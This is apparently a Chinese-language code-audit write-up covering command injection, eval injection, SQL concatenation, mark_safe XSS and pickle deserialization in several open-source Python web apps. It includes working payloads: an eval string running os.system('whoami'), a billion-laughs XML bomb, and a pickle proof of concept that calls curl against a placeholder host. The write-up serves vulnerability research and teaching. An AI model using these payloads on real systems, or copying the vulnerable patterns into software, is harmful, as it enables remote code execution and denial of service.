\app\admin\base_view.py
\app\admin\function.py
cmd_dict={
'upgrade':"cd {} && git pull origin master && bash update.sh".format(config_dir),
'running_log':'tail -30f {}/logs/PyOne.{}.log'.format(config_dir,'running'),
'error_log':'tail -30f {}/logs/PyOne.{}.log'.format(config_dir,'error')
}
command=cmd_dict[request.args.get('command')]
def generate():
popen=subprocess.Popen(command,stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True)
这里采用了shell=True
,可以执行bash命令,从功能上看是可以执行命令的地方,而且执行的是cmd_dict
中的命令,如果config_dir
可控,那就说明可以命令执行。config_dir
在配置文件中,安装的时候会触发。
python xxx.py || whoami
同样,这里有格式化字符串,如果可控,还可以利用格式化字符串来执行命令
"cd {} && git pull origin master && bash update.sh".format(''.__class__.__mro__[-1].__subclasses__())
app\admin\install.py
安装文件,连接mongo数据库的时候,会执行一次eval。模块使用的pymongo,eval貌似必要性不大。
try:
mongo = MongoClient(host=host,port=int(port),connect=False,serverSelectionTimeoutMS=3)
mon_db=eval('mongo.{}'.format(db))
db参数可控,通过db=request.form.get('db')
获取。传参如下格式可以执行命令
__class__.__mro__[-1].__subclasses__()
m&__import__("os").system("whoami")
xmlrpc.client
模块默认不会遭受XXE,但是很容易受到实体扩展攻击。
使用类似如下XML文档的时候,会处理完所有实体扩展之后,这个小的(<1 KB)XML块实际上将包含10 9 = 10 亿个“lol”
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
Products\zms\_fileutil.py
_fileutil
文件中有一处执行命令的地方
def executeCommand(path, command):
os.chdir(path)
os.system(command)
command 是执行命令功能处接收的参数,只不过此处是使用了os下的system模块来处理,ZMSLog
文件调用了这个方法来执行功能。
if REQUEST.get("btn") == "Execute":
command = REQUEST['command']
_fileutil.executeCommand(path, command)
message = "Command executed."
Products\zms\zmssqldb.py
文件中写有执行的SQL语句,全部是采用拼接形式。并且接收的参数没有做处理
tablename = REQUEST['obj_id']
columnname = REQUEST['attr_id']
RESPONSE = REQUEST.RESPONSE
content_type = 'text/plain; charset=utf-8'
filename = 'ajaxGetObjOptions.txt'
RESPONSE.setHeader('Content-Type', content_type)
RESPONSE.setHeader('Content-Disposition', 'inline;filename="%s"'%filename)
RESPONSE.setHeader('Cache-Control', 'no-cache')
RESPONSE.setHeader('Pragma', 'no-cache')
l = []
q = REQUEST.get( 'q', '').upper()
limit = int(REQUEST.get('limit', self.getConfProperty('ZMS.input.autocomplete.limit', 15)))
pk = self.getEntityPK(tablename)
sql = 'SELECT %s AS pk, %s AS displayfield FROM %s WHERE UPPER(%s) LIKE %s ORDER BY UPPER(%s)'%(pk, columnname, tablename, columnname, self.sql_quote__(tablename, columnname, '%'+q+'%'), columnname)
for r in self.query(sql)['records']:
以下问题不一定存在漏洞,这个不一定是使用上的导致漏洞,下面还会用来提到,主要是这种形式极易导致问题产生,所以拿来做样例代码解释。
在说到这个问题之前,先提一下,此场景并不是造成xss的原因,或者说这个情况是不能直接造成的。只是用来做解释一个场景下可能造成的问题。
class Media(models.Model):
"""Media model :class:`Media <pages.models.Media>`"""
title = models.CharField(_('title'), max_length=255, blank=True)
description = models.TextField(_('description'), blank=True)
url = models.FileField(_('url'), upload_to=media_filename)
extension = models.CharField(_('extension'), max_length=32, blank=True,
editable=False)
creation_date = models.DateTimeField(_('creation date'), editable=False,
default=get_now)
def image(self):
if self.extension in ['png', 'jpg', 'jpeg']:
return mark_safe('<img width="60" src="%s" />' % os.path.join(
settings.PAGES_MEDIA_URL, self.url.name))
if self.extension == 'pdf':
return mark_safe('<i class="fa fa-file-pdf-o" aria-hidden="true"></i>')
if self.extension in ['doc', 'docx']:
return mark_safe('<i class="fa fa-file-word-o" aria-hidden="true"></i>')
if self.extension in ['zip', 'gzip', 'rar']:
return mark_safe('<i class="fa fa-file-archive-o" aria-hidden="true"></i>')
return mark_safe('<i class="fa fa-file-o" aria-hidden="true"></i>')
image.short_description = _('Thumbnail')
class Meta:
verbose_name = _('media')
verbose_name_plural = _('medias')
def save(self, *args, **kwargs):
parts = self.url.name.split('.')
if len(parts) > 1:
self.extension = parts[-1].lower()
if not self.title:
parts = self.url.name.split('/')
self.title = parts[-1]
super(Media, self).save(*args, **kwargs)
在某些框架中,为了渲染后台或者页面等,会大量使用mark_safe
和format_html
来生成HTML代码。毕竟views是不能直接返回到页面HTML的。那么这里会有一个问题是,这个models生成图片地址的时候是从url中获取地址直接拼接到HTML中,由于这里是定义了short_description
所以这个字段下,是生成的html,我们从save中看出来,这里只是获取了文件后缀来做判断。
那么理论上,只要前台使用的时候,保存models没有验证字符串不就会造成XSS,甚至由于拼接路径,还会造成文件读取嘛。之所以说这个不能直接造成,这个地方利用一个upload_to
,定义上传文件目录,但是这里是自定义文件的形式。
def media_filename(instance, filename):
avoid_collision = uuid.uuid4().hex[:8]
name_parts = filename.split('.')
if len(name_parts) > 1:
name = slugify('.'.join(name_parts[:-1]), allow_unicode=True)
ext = slugify(name_parts[-1])
name = name + '.' + ext
else:
name = slugify(filename)
filename = os.path.join(
settings.PAGE_UPLOAD_ROOT,
'medias',
name
)
return filename
其中使用了slugify
来处理文件名和后缀,这个函数使用正则匹配的方式去获取其中的字母数字下划线,来过滤特殊字符。
def slugify(value, allow_unicode=False):
value = force_text(value)
if allow_unicode:
value = unicodedata.normalize('NFKC', value)
value = re.sub('[^\w\s-]', '', value, flags=re.U).strip().lower()
return mark_safe(re.sub('[-\s]+', '-', value, flags=re.U))
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('ascii')
value = re.sub('[^\w\s-]', '', value).strip().lower()
return mark_safe(re.sub('[-\s]+', '-', value))
所以这里如果设定了硬编码的文件目录,或者是使用了参数式的上传文件目录等,在不正确的使用下,就会造成XSS。
找了半天没找到一个好看的文件删除样例,就用这个样例。获取文件夹地址,这个方法是用来删除七天后的文件,通过django的文件系统来获取目录下的文件,然后根据时间来删除。唯一的问题是dir_path,但是原系统中不存在问题,只是因为使用的时候这个目录是硬编码进去的。
def directory_cleanup(dir_path, ndays):
if not default_storage.exists(dir_path):
return
foldernames, filenames = default_storage.listdir(dir_path)
for filename in filenames:
if not filename:
continue
file_path = os.path.join(dir_path, filename)
modified_dt = default_storage.get_modified_time(file_path)
if modified_dt + timedelta(days=ndays) < datetime.now():
# the file is older than ndays, delete it
default_storage.delete(file_path)
for foldername in foldernames:
folder_path = os.path.join(dir_path, foldername)
directory_cleanup(folder_path, ndays)
这一段是用来生成一个32位大小写数字的字符串。
def random_string(n=32):
return ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for x in range(n))
此SQL并不会引发注入,因为使用方式的原因,但确是一个明显的不正确的写法。
从下面可以看出来,函数使用了extra()
来编写一个复杂的select从句,但是这个SQL使用了拼接类型的字符串格式化。
def get_forms(self, items, days):
from tendenci.apps.forms_builder.forms.models import Form
dt = datetime.now().replace(hour=0, minute=0, second=0, microsecond=0) - timedelta(days=days)
forms = Form.objects.extra(select={
'submissions': "SELECT COUNT(*) " +
"FROM forms_formentry " +
"WHERE forms_formentry.form_id = " +
"forms_form.id AND " +
"forms_formentry.create_dt >= TIMESTAMP '%s'" % dt})
forms = forms.order_by("-submissions")[:items]
forms_list = []
for form in forms:
forms_list.append([form.title,
form.get_absolute_url(),
form.submissions,
reverse('form_entries', args=[form.pk])])
return forms_list
正确的写法应该是
forms = Form.objects.extra(select={
'submissions': "SELECT COUNT(*) " +
"FROM forms_formentry " +
"WHERE forms_formentry.form_id = " +
"forms_form.id AND " +
"forms_formentry.create_dt >= TIMESTAMP '%s'"}, select_params=(dt,))
这里有一个反序列化样例,来自一个开源协会管理系统,还顺便帮我拿了一个CVE:CVE-2020-14942
def ticket_list(request):
context = {}
......
if request.GET.get('saved_query', None):
from_saved_query = True
try:
saved_query = SavedSearch.objects.get(pk=request.GET.get('saved_query'))
except SavedSearch.DoesNotExist:
return HttpResponseRedirect(reverse('helpdesk_list'))
if not (saved_query.shared or saved_query.user == request.user):
return HttpResponseRedirect(reverse('helpdesk_list'))
import pickle
from base64 import b64decode
query_params = pickle.loads(b64decode(str(saved_query.query).encode()))
elif not ( 'queue' in request.GET
or 'assigned_to' in request.GET
or 'status' in request.GET
or 'q' in request.GET
or 'sort' in request.GET
or 'sortreverse' in request.GET
):
从上面代码看出,这是一个从views中获取参数saved_query
,通过id判断请求的用户和数据所属用户身份,正确后反序列化其中的query值,那么这个数据库是如下,保存的是一个文本字段。
class SavedSearch(models.Model):
......
query = models.TextField(
_('Search Query'),
help_text=_('Pickled query object. Be wary changing this.'),
)
如何去处理这个字段的值,在上个文件中,找到保存的处理方法。从post中获取query_encoded
,判断不为空则直接保存进数据库。
def save_query(request):
title = request.POST.get('title', None)
shared = request.POST.get('shared', False) in ['on', 'True', True, 'TRUE']
query_encoded = request.POST.get('query_encoded', None)
if not title or not query_encoded:
return HttpResponseRedirect(reverse('helpdesk_list'))
query = SavedSearch(title=title, shared=shared, query=query_encoded, user=request.user)
query.save()
那么如何调用的,同样去搜索关键词save_query
找到路由,找到对应的name为helpdesk_savequery
,找到对应的前端表单
<form method='post' action='{% url 'helpdesk_savequery' %}'>
<input type='hidden' name='query_encoded' value='{{ urlsafe_query }}' />
<dl>
<dt><label for='id_title'>{% trans "Query Name" %}</label></dt>
<dd><input type='text' name='title' id='id_title' /></dd>
<dd class='form_help_text'>{% trans "This name appears in the drop-down list of saved queries. If you share your query, other users will see this name, so choose something clear and descriptive!" %}</dd>
<dt><label for='id_shared'>{% trans "Shared?" %}</label></dt>
<dd><input type='checkbox' name='shared' id='id_shared' /> {% trans "Yes, share this query with other users." %}</dd>
<dd class='form_help_text'>{% trans "If you share this query, it will be visible by <em>all</em> other logged-in users." %}</dd>
</dl>
<div class='buttons'>
<input class="btn btn-primary" type='submit' value='{% trans "Save Query" %}'>
</div>
{% csrf_token %}</form>
从表单中可以看到,query_encoded
是模板写入,找到urlsafe_query
看是如何调用的,从调用结果看,就知道是后台先去序列化然后赋值给模板,前端模板操作的时候,再把这个序列化的值传入后台中去反序列化。
......
import pickle
from base64 import b64encode
urlsafe_query = b64encode(pickle.dumps(query_params)).decode()
尝试构造一个反序列化的poc
import pickle,os
from base64 import b64encode
class exp(object):
def __reduce__(self):
return (os.system,('curl http://xxxx/py',))
e = exp()
b64encode(pickle.dumps(e))
造成此问题的原因是拼接语句,直接使用数据库中的数据,例如如下代码,fields
字段是一个元组,使用OrderedDict
来维护一个键排序的链表。
for form_id in form_ids:
rows_list = []
custom_reg_form = CustomRegForm.objects.get(id=form_id)
fields = CustomRegField.objects.filter(
form=custom_reg_form).order_by('position').values_list('id', 'label')
fields_dict = OrderedDict(fields)
......
registrant_tuple = CustomRegistrantTuple(**registrant)
sql = """
SELECT field_id, value
FROM events_customregfieldentry
WHERE field_id IN (%s)
AND entry_id=%d
""" % (','.join([str(id) for id in fields_dict]), entry_id)
cursor.execute(sql)
entry_rows = cursor.fetchall()
values_dict = dict(entry_rows)
当使用数据库中的字段是添加的字段的时候,就会在sql处造成拼接,至于此处由于是使用了数据库字段的id值,并非数据库其他字段,所以并没有造成注入。